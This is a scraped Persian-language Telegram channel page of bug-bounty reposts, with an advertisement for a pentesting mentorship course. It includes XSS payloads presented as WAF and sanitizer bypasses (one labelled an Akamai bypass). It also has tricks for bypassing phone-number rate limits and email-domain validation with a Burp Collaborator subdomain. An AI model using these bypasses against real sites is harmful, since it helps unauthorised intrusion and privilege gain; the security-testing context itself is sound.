Chillsec
رفتن به کانال در Telegram
464
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز
آرشیو پست ها
464
Repost from Web Application Security
سایت https://pocorexp.nsa.im/ همهی CVEها رو فهرست کرده و اگر برای هرکدوم اکسپلویت پابلیک وجود داشته باشه، اون رو هم پایینش قرار میده.
464
<22 foo="<img src=x onerror='alert(1)'">test</22>
this payload may help you to bypass WAF or trick sanitizers464
Repost from Web Application Security
جاهایی که rate limit روی شماره کار میکنه، میتونیم با اضافه کردن + به +98 بایپسش کنیم.
#rate_limit_bypass
464
Repost from Bug Bounty - GitBook
Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
@GitBook_s464
رضا یکی از خفن ترین و بهترین استاداییه که من داشتم.
بشدت کارش خفنه.
اگه تونستید حتما شرکت بکنید
464
Repost from PentesterLand Academy - Public
توضیحات ثبت نام منتورینگ که درواقع نقشه راه این دوره است:
منتورینگ شامل ۴۰۰ ساعت ویدیو ضبط شده است که شامل یک سری دوره های مخصوص منتورینگ و یکی سری دوره های من در طول مدت کوچینگ مادام العمر خواهد بود(البته در صورت انجام رفتار خلاف قوانین مثل نشر ویدیو یا همکاری با تیم ها و جاهای دیگر که باعث شک در نقض محرمانگی شود میتواند باعث ریموو شدن کاربر گردد دلیل این موضوع مشکل است: در لایو هانت های منتورینگ سناریو های پیشرفته و متفاوت روی تارگت های باگ بانتی انجام میپذیرد).
پرسش و پاسخ، لایو هکینگ و لایو های دائم هفتگی و ماهانه به همراه اپدیت و اپگرید کامل دوره ها که به صورت رایگان در طول زمان کوچینگ اختیار دانشجویان قرارمیگیرد، در منتورینگ هردانشجو میتواند در طول روز سوالاتاش را مستقیم از شخص مدرس بپرسد یا از گروه های مربوط به منتورینگ استفاده کند
مواردی که تا اینجا تکمیل شده در منتورینگ
بخش اینترو و استارت پن تست وب اپلیکیشن، api, دیتابیس ها sql & nos l
برنامه نویسی جی اس (client side & server side)و مطالب پایه وب هکینگ
مطالبسطح متوسط و اکسپرت وب هکینگ که به حملات api ها نیز پرداخته شده است
باگ بانتی و خودکار سازی حملات
اکسپلویت نویسی با پایتون
سرویس هانتینگ
موارد در حال تکمیل
RedTeam
تمامی موارد از پیشنیاز اغاز میشود تا سطح
پیشرفته
تمام سطوح هرچند یکبار بسته به نیاز و تغییرات، اپدیت و اپگرید خواند شد
تمام پشتیبانی دانشجویان توسط خود من انجام میگردد
برای ثبت نام:
Page instagram: PentesterLand پیام دهید
464
Repost from Bugbounty Tips
+1
اینجا برای اینکه امکان ثبت نام در سامانه میسر باشه باید با یکی از ایمیل های معتبری که قبلا تعریف شده ثبت نام انجام بشه مثل:
example@immuniweb.com
همونجور که میدونید Burp Collaborator امکان دریافت SMTP Connection رو هم داره.
پس ما میتونیم با قرار دادن دامین مورد نظر در سابدامین Collaborator خودمون این Validation رو بایپس کنیم:
example@immuniweb.com.Collaborator.com
به همین سادگی امکان دور زدن این مکانیزم وجود داره،
نکته ایی که مهمه اینه شما میتونید در جاهای متنوعی مخصوصا جاهایی Role های مختلف و سطح دسترسی های مختلفی داره ثبت نام رو انجام بدید ممکنه اگر با ایمیل معتبر سازمان ثبت نام کنید، ممکنه به صورت پیشفرض دسترسی سطح بالاتری بهتون اختصاص داده بشه.
#bugbounty
#challange
#bugbountytips
#testcase
464
amazing nginx root me challange:
https://www.root-me.org/en/Challenges/Web-Server/Nginx-Root-Location-Misconfiguration
